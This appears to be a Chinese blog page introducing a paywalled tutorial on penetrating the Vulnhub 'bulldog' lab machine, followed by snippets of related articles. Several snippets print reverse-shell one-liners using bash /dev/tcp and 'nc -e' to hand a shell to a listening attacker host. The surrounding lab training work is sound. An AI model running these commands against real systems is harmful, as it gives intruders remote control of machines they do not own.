[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

最新推荐文章于 2026-05-20 06:03:47 发布
原创 最新推荐文章于 2026-05-20 06:03:47 发布 · 1.1w 阅读 · 21
标签
#网络安全 #Vulnhub #bulldog #信息收集 #反弹shell
本文是网络安全自学教程的一部分,详细介绍了Vulnhub靶机bulldog的渗透过程,包括信息收集、端口扫描、目录扫描、源码解读、权限提升和shell反弹。作者通过分析靶机信息,利用命令注入和Webshell反弹shell,最终获取root权限并找到flag。文章适合网络安全初学者学习。

这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。

作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~

文章目录

PS:本文参考了github、安全网站和参考文献中的文章(详见参考文献),并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。

作者的github资源:
软件安全:https://github.com/eastmountyxz/Software-Security-Course
其他工具:https://github.com/eastmountyxz/NetworkSecuritySelf-study
Wannacry分析:https://github.com/eastmountyxz/WannaCry-Experiment


声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。

前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例

了解本专栏 订阅专栏 解锁全文
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机shell窗口
Bulldog靶机 学习总结 网络安全
Shelby12345的博客
01-31 1362
发现了自己django,然后注意到有个id是bulldogadmin的很可疑,再系统中查找一下bulldogadmin所属的文件find / -user bulldogadmin 2>/dev/null(输入SUPERultimatePASSWORDyouCANTget,密码错误,又去找了找前辈的答案,发现H都是多余的,SUPERultimatePASSWORDyouCANTget。直接访问http://192.168.144.137/admin/ 发现需要登陆,F12看一下很干净,没藏东西。
反弹shell初识
无痕的博客
11-01 4608
反弹shell的指令演示
实验室到量产车:聊聊激光雷达外参标定那些‘坑’自动化趋势
最新发布
weixin_30407613的博客
05-20 479
本文深入探讨了激光雷达外参标定在从实验室到量产车过程中面临的工程化挑战自动化趋势。分析了精度、效率鲁棒性大门槛,并对比了手眼标定法、连续时间标定在线标定等主流方法的工程适配性。同时,详细介绍了自动化标定系统的四大核心模块,并预测了未来年的技术演进方向,为无人车领域的激光雷达标定提供了实用见解。
反弹Shell原理实现
m0_62451321的博客
11-14 4182
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
nc的使用+反弹shell
2301_80366980的博客
02-18 1973
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
反弹shell总结
weixin_44576725的博客
04-26 4948
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端服务端的角色反转。反弹shell简单来说就是通过命令让靶机shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
反弹shell从入门到进阶
飞鱼的企鹅的博客
10-14 429
前言 在渗透测试过程中,反弹shell是获取到权限的一种很重要的方式,一直用那些反弹shell的命令却不知道是什么意思,现在来专门学习一下原理。 什么是反弹shell 反弹shell(reverse shell),就是监控端在监控某TCP/UDP端口,被控制端使用漏洞或其他方法发起请求到该端口,并将其命令行的输入输出转到控制端。 为什么要反弹shell 当我们已经打开了被攻击机的相应端口,如22,...
反弹shell原理
Monica的博客
11-01 2523
原理 反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shelltelnet,ssh等标准shell对应,本质上是网络概念的客户端服务端的角色反转。 实验案例 实验环境: 攻击端:mac ip地址:192.168.57.252 受害端:kali linux ip地址:10.211.5519 nc反弹: 攻击端mac终端输入: nc ...
干货分享—Linux之渗透测试常用反弹shell方法总结!黑客技术零基础入门到精通实战教程!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-18 1004
反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以想办法避开防火墙路由的一些限制的!我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
反弹shell原理实现
没有网络安全就没有国家安全
03-08 1308
反弹shell原理实现
【基础】————24、内网跨边界应用
Fly_鹏程万里
05-27 1383
0x01 端口转发 NC端口转发 nc使用方法: a、反向连接 在公网主机上进行监听: nc -lvp 4444 在内网主机上执行: nc -t -e cmd.exe 公网主机ip 4444 上述命令中 -t 参数是指通过telnet模式执行cmd.exe,可省略,成功后即可得到一个内网主机的cmd shell。 b、正向连接 远程主机上执行: nc -l -...
论内网渗透中,反弹shell的各种姿势
热门推荐
土豆的博客
12-13 7万+
反弹shell是进入内网的第一步,也是权限提升用到的至关重要的一步。 1、bash反弹 攻击机: nc -lvp 4444 客户机: bash -i>& /dev/tcp/10.1.2.2/4444 0>&1 命令介绍: nc -i使用监听模式 -v 显示命令执行过程 -p 指定端口号。 -e 执行给定的命令 bash -i使用交互模式, -c 执行跟的命令 重定向 0:标准输入,
利用nc反弹shell实验
weixin_42299610的博客
03-19 1603
反弹shell 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shelltelnet,ssh等标准shell对应,本质上是网络概念的客户端服务端的角色反转。 利用nc正向连接shell实验 步骤一:被控服务器shell反弹到本地的4444端口,并监听4444端口 nc –lvp 44...
bulldog 靶机
weixin_51559599的博客
10-19 288
在此界面的源码中发现了疑似加密的信息,依次解密查看。
各种反弹shell原理
haoge1998的博客
04-18 1万+
各种反弹shell原理 一、理解反弹shell 1、为什么需要反弹shell 当正向连接不可达时候 客户机中了木马,但是在局域网内,无法正向连接。 由于防火墙局域网的限制,对方只能发送请求,不可主动接受请求 2、原理 反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端 二、常用的反弹shell命令 1、bash进行反弹 (1)在windows上启动监听端口 nc -lvp 4444 l:代表入站监听 v:代表输出信息级别 p:代表监听的端口 (2)在Lin
反弹shell的几种方法
星河梦瑾的博客
09-19 1624
目标服务器系统:Ubuntu、CentOS。 攻击者系统:Kali Linux,IP地址为 192.168.0.1,开放 4444 端口。 反弹Shell: 正向反弹Shell:目标机先执行 nc -lvp 4444 -e /bin/bash,然后攻击者使用 nc ip 4444 监听,可以实现Shell反弹。 反向反弹Shell:有多种方法,包括使用 bash、python、nc 本身,以及 php 来实现。每种方法都需要在攻击者机器上先使用 nc -lvp 端口号 进行监听
bulldog123靶机渗透
yyh的博客
06-03 567
实验环境: 攻击机:Kali(192.168.150.129) 靶机bulldog123(未知) 思路: 信息收集=>寻找漏洞=>利用漏洞反弹shell=>提权至root=>清理痕迹 主机发现:(netdiscover) 被动监听netdiscover -p 主动扫描:netdiscover -i eth0 -r 192.168.150.0/24 端口扫描(masscan): masscan --rate=10000 -p 0-65535 192.168.150.132,#r
渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash(1)
2401_84969775的博客
05-13 805
(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)目录,ubuntu是。
瑞士军刀NC(NETCAT)常用方法
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-24 768
1、NC(NETCAT) NC分为被动监听/主动连接模式 1.telnet/获取banner信息 nc -nv 192.168.1.1 80 nc -nv ip port #-n 参数为不进行dns解析 #-v 显示详细信息 2.传输文本 服务端:nc -lvp 4444 #-l 监听模式 #-p 设置监听端口 客户端:nc -nv 192.168.1.1 4444 nc -lvp 333 > ps.txt ps -aux | nc -nv 192.168.1.1 333 -q 1 #-q 1 传
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eastmount

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值